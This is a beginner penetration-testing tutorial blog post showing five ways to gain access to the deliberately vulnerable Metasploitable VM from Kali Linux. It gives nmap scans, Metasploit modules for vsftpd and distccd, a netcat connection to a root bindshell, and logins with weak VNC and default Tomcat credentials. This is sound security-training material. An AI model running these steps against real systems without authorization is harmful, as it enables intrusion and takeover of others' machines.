Hack Metasploitable machine in 5 ways using Kali Linux 🤯😈

atenadadkhah

Atena Dadkhah

Posted on March 9, 2023

Hack Metasploitable machine in 5 ways using Kali Linux 🤯😈

Hi there!👋
Today I'm going to show you how we can HACK Metasploitable virtual machine in 5 different ways to learn penetration testing with Nmap and Metasploit framework.

Let's get into it!

cute hacker penetration testing kali linux

Before we get our hands dirty, we need to take some steps.

1. Install Kali Linux

For penetration testing or any cybersecurity activity it's better to have a Linux based operating system running on our systems.
If you don't have any Linux OS installed on your machine, You can install Kali Linux on a virtualbox like Oracle VM VirtualBox.

2. Install Metasploitable Virtual Machine

Let me introduce Metasploitable virtual machine to you.

Metasploitable is an intentionally vulnerable Linux virtual machine that can be used to conduct security training, test security tools, and practice common penetration testing techniques.

You can download metasploitable virtual machine and again install that on Oracle virtualbox.

3. Nmap And Metasploitable Framework

Nmap allows you to scan your network and discover not only everything connected to it, but also a wide variety of information about what's connected, what services each host is operating, and so on.

The Metasploit Framework is a Ruby-based, modular penetration testing platform that enables you to write, test, and execute exploit code. The Metasploit Framework contains a suite of tools that you can use to test security vulnerabilities, enumerate networks, execute attacks, and evade detection.

By default Kali Linux has Nmap and metasploitable installed in it, but if you are using other Linux distro (e.g. Ubuntu) you need to install these packages.


REMEMBER
You should change network adapter for your Linux OSes (Kali & Metasploitable) on Bridge Adapter for their IPs to be in the same range as your device. (In Oracle go to Settings > Network > adapter 1)

Now, it's time for us to start hacking and get our hands dirty. 😈

Run both kali Linux and Metasploitable.

Then we should get the IP address of Metasploitable. Just type this command in metasploitable.



ifconfig


Enter fullscreen mode Exit fullscreen mode

Then it shows some results containing the IP address. Mine is in eth0 192.168.1.3.

Now we should scan the target machine in Kali Linux using Nmap.



nmap -sV 192.168.1.3 -p-


Enter fullscreen mode Exit fullscreen mode

Remember to write your own target machine IP in this command

-sV : This is a service version scan. In order to know what
exploits will work, it is very helpful to know the service
version behind an open port.

-p- : Scans all ports.

Then you'll see a result such as this:

nmap scan on metasploitable
As you might know the more open ports we have in a server, the less secure that server is. The reason is because the possibility of having vulnerable ports to exploit increases.

1. VSFTPD Open Port

I'll start with the first open port (port 21 vsftpd).
In your console, start the Metasploit framework by this command:



msfconsole


Enter fullscreen mode Exit fullscreen mode

After metasploit started, type this:



search vsftpd


Enter fullscreen mode Exit fullscreen mode

By this command we are searching for the service of the first open port that we've found.

Now you'll see a result like this:

search vsftpd to exploit
As you see we found 1 excellent module to exploit this port.
Let's use it.



use 0


Enter fullscreen mode Exit fullscreen mode

And now we should know what options should we pass to this module to work.



show options


Enter fullscreen mode Exit fullscreen mode

As the result says we should only specify RHOST which is the IP of our target machine.



set RHOST <your-target-machine-IP>


Enter fullscreen mode Exit fullscreen mode

Now we are ready to exploit the Metasploitable.



exploit


Enter fullscreen mode Exit fullscreen mode

And BAM!!!
You can now run any command you want or do malicious things to the target machine.

exploit Metasploitable

2. Bindshell Open Port

Let's get into the second vulnerability which is very easy to detect.

Well This one is the most hilarious type of vulnerability that a machine can have which takes us straight to the root account and normally is very rare.

To do so, we use netcat.



nc <your-target-machine-IP> <port>


Enter fullscreen mode Exit fullscreen mode

The port in this case is 1524.
And now we are the root account because of the stupid mistake of the admin.

netcat access root account vulnerability

3. DISTCCD Open Port

distccd service is another vulnerable port which is open.



search distccd


Enter fullscreen mode Exit fullscreen mode

It gives us 1 module to use.



use 0


Enter fullscreen mode Exit fullscreen mode

Again we have to specify the RHOST.



set RHOST <your-target-machine-IP>


Enter fullscreen mode Exit fullscreen mode

Now type this:



show payloads


Enter fullscreen mode Exit fullscreen mode

This command gives us every available command that we can use to exploit the target.

payload options for distccd
In this case we should use payload number 5.



set payload 5


Enter fullscreen mode Exit fullscreen mode

Then exploit it.



exploit


Enter fullscreen mode Exit fullscreen mode

And YEAH! we could exploit it for the 3rd time.😎

4. VNC Open Port

Another important vulnerability in our Nmap scan is the port 5900 which belongs to VNC.
Exploiting this one is a little bit different but more interesting. 😛

Type this command:



vnc <your-target-machine-IP>


Enter fullscreen mode Exit fullscreen mode

Now we should enter the passsword.
If we type msfadmin it throws an authentication failure.
But if we type password as the password we can access it because of its weak password.

VNC remote connection vulnerability

5. Apache Vulnerability

In this item we're going to use Nmap script to find a vulnerability in Metasploitable Apache.

The Nmap Scripting Engine (NSE) is one of Nmap's most powerful and flexible features. It allows users to write (and share) simple scripts to automate a wide variety of networking tasks. Those scripts are then executed in parallel with the speed and efficiency you expect from Nmap.

We have different categories of NSE scripts such as auth, broadcast, brute, default. discovery, dos, exploit ...etc.
We are going to use auth.



nmap --script auth <your-target-machine-IP> -sV


Enter fullscreen mode Exit fullscreen mode

If you scroll down, you'll see one of the auth vulnerabilities is for Apache at port 8180 which shows us the username and the password.

Apache auth vulnerability

Simply type this URL in your browser:



<your-target-machine-IP>:8180/admin/


Enter fullscreen mode Exit fullscreen mode

Then as our scan revealed, type tomcat as the username and the
password.

You are now logged in to the Apache server of the target. Congratulation!🥳

Apache hack login


Conclusion

Since Metasploitable is for learning penetration testing, you can find other vulnerabilities as well which if you are interested in, you may do just like what we did in this post.
Led me know if you found other vulnerabilities.😉
Thanks!🤡

💖 💪 🙅 🚩
atenadadkhah
Atena Dadkhah

Posted on March 9, 2023

Join Our Newsletter. No Spam, Only the good stuff.

Sign up to receive the latest update from our blog.

Related